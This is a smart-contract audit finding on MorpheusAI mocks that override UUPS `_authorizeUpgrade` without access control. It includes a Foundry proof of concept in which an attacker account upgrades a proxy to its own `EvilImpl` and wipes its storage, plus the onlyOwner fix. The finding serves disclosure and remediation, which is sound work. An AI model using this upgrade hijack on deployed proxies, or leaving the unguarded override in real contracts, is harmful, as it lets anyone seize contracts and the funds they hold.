MorpheusAI

Foundry
22,500 USDC
Submission Details
Severity: medium
Valid

Multiple mocks lack an access control modifier on the function `_authorizeUpgrade`

Summary

The contracts L1SenderV2.sol, L2MessageReceiver.sol, L2TokenReceiverV2.sol and DistributionV2.sol override `_authorizeUpgrade` without `onlyOwner` or any other access control modifier.

Contracts that inherit UUPSUpgradeable must override `_authorizeUpgrade` and restrict it with an access control modifier such as `onlyOwner`; otherwise the upgrade path is open to every caller.

Vulnerability Details

`_authorizeUpgrade` is the hook that UUPSUpgradeable invokes from `upgradeTo`/`upgradeToAndCall` before the proxy's implementation slot is rewritten. It is declared abstract, so every concrete contract has to override it, and that override must carry an access modifier such as `onlyOwner`. An empty body means any account can pass the address of its own malicious implementation, and the proxy will delegate every subsequent call to it.

The OpenZeppelin docs give clear instructions on how to implement UUPSUpgradeable here:
https://docs.openzeppelin.com/contracts/4.x/api/proxy#UUPSUpgradeable-_authorizeUpgrade-address-
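To make the mechanism concrete, the following is an added example, not code from the MorpheusAI repository: a minimal UUPS contract with the unguarded `_authorizeUpgrade` described above, the same contract with the `onlyOwner` guard, and a Foundry test in which an arbitrary account (`attacker`) swaps in its own implementation through the proxy. The contract names `VaultV1Unguarded`, `VaultV1Guarded` and `EvilImpl` are hypothetical, and the example assumes OpenZeppelin Contracts 4.9.x (upgradeable and standard packages) plus forge-std are installed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not MorpheusAI code. Assumes OpenZeppelin Contracts 4.9.x
// (both @openzeppelin/contracts and @openzeppelin/contracts-upgradeable) and
// forge-std are available through the usual remappings.
import {UUPSUpgradeable} from "@openzeppelin/contracts-upgradeable/proxy/utils/UUPSUpgradeable.sol";
import {OwnableUpgradeable} from "@openzeppelin/contracts-upgradeable/access/OwnableUpgradeable.sol";
import {ERC1967Proxy} from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";
import {Test} from "forge-std/Test.sol";

/// Vulnerable form (hypothetical contract): the override is empty, so
/// upgradeTo() on the proxy succeeds for any msg.sender.
contract VaultV1Unguarded is UUPSUpgradeable {
    uint256 public balance;
    constructor() { _disableInitializers(); }
    function initialize() external initializer { balance = 100 ether; }
    function _authorizeUpgrade(address) internal override {}
}

/// Hardened form: only the owner set in initialize() may upgrade.
contract VaultV1Guarded is UUPSUpgradeable, OwnableUpgradeable {
    uint256 public balance;
    constructor() { _disableInitializers(); }
    function initialize() external initializer { __Ownable_init(); balance = 100 ether; }
    function _authorizeUpgrade(address) internal override onlyOwner {}
}

/// Attacker-controlled implementation. It must itself be UUPS-compatible so
/// that upgradeTo()'s proxiableUUID() check passes; its storage layout
/// mirrors VaultV1Unguarded so `balance` lands in the same slot.
contract EvilImpl is UUPSUpgradeable {
    uint256 public balance;
    function drain() external { balance = 0; }
    function _authorizeUpgrade(address) internal override {}
}

contract AuthorizeUpgradeTest is Test {
    // ERC-1967 implementation slot: keccak256("eip1967.proxy.implementation") - 1
    bytes32 constant IMPL_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
    address attacker = makeAddr("attacker");

    function _implOf(ERC1967Proxy proxy) internal view returns (address) {
        return address(uint160(uint256(vm.load(address(proxy), IMPL_SLOT))));
    }

    function testAnyoneCanUpgradeUnguarded() public {
        ERC1967Proxy proxy = new ERC1967Proxy(
            address(new VaultV1Unguarded()),
            abi.encodeCall(VaultV1Unguarded.initialize, ())
        );
        assertEq(VaultV1Unguarded(address(proxy)).balance(), 100 ether);

        // An unrelated account replaces the implementation and then calls
        // the function it planted there, rewriting the proxy's storage.
        address evil = address(new EvilImpl());
        vm.prank(attacker);
        UUPSUpgradeable(address(proxy)).upgradeTo(evil);
        assertEq(_implOf(proxy), evil);

        EvilImpl(address(proxy)).drain();
        assertEq(EvilImpl(address(proxy)).balance(), 0);
    }

    function testOnlyOwnerCanUpgradeGuarded() public {
        ERC1967Proxy proxy = new ERC1967Proxy(
            address(new VaultV1Guarded()),
            abi.encodeCall(VaultV1Guarded.initialize, ())
        );
        address evil = address(new EvilImpl());

        // Same call from the attacker now reverts in onlyOwner.
        vm.prank(attacker);
        vm.expectRevert("Ownable: caller is not the owner");
        UUPSUpgradeable(address(proxy)).upgradeTo(evil);

        // The deployer (this test contract) became owner in __Ownable_init
        // and is still able to upgrade.
        UUPSUpgradeable(address(proxy)).upgradeTo(evil);
        assertEq(_implOf(proxy), evil);
    }
}
```

Run with `forge test --match-contract AuthorizeUpgradeTest -vv`. Note that the attacker's implementation has to inherit UUPSUpgradeable (or at least expose `proxiableUUID()`) because OpenZeppelin 4.x verifies the new implementation's ERC-1822 UUID before switching; that check is a safety net against bricking the proxy, not an access control, and does nothing to stop this upgrade.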

Impact

Leaving `_authorizeUpgrade` without an access control modifier such as `onlyOwner` allows anyone to call `upgradeTo` on the proxy and point it at a malicious implementation, which then controls all of the proxy's storage and any funds it holds.

Tools Used

Manual Review

Recommendations

Consider following the OpenZeppelin docs and adding an access control modifier such as `onlyOwner` to every `_authorizeUpgrade` override:

- function _authorizeUpgrade(address) internal view override {}
+ function _authorizeUpgrade(address) internal view override onlyOwner {}
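Review bot: the `onlyOwner` added on the `+` line only compiles and only works if each of the four contracts named in the summary already inherits an Ownable-style contract and sets its owner in its initializer; without that, the modifier is either undefined or reverts for every caller, which leaves the proxy permanently unupgradeable. The recommendation should say so, and should spell out that the `view` keyword on the override is optional (OpenZeppelin's documented signature omits it) so that reviewers applying the one-line change do not read it as required.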
Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

_authorizeUpgrade(address) lacks access control in mock contracts
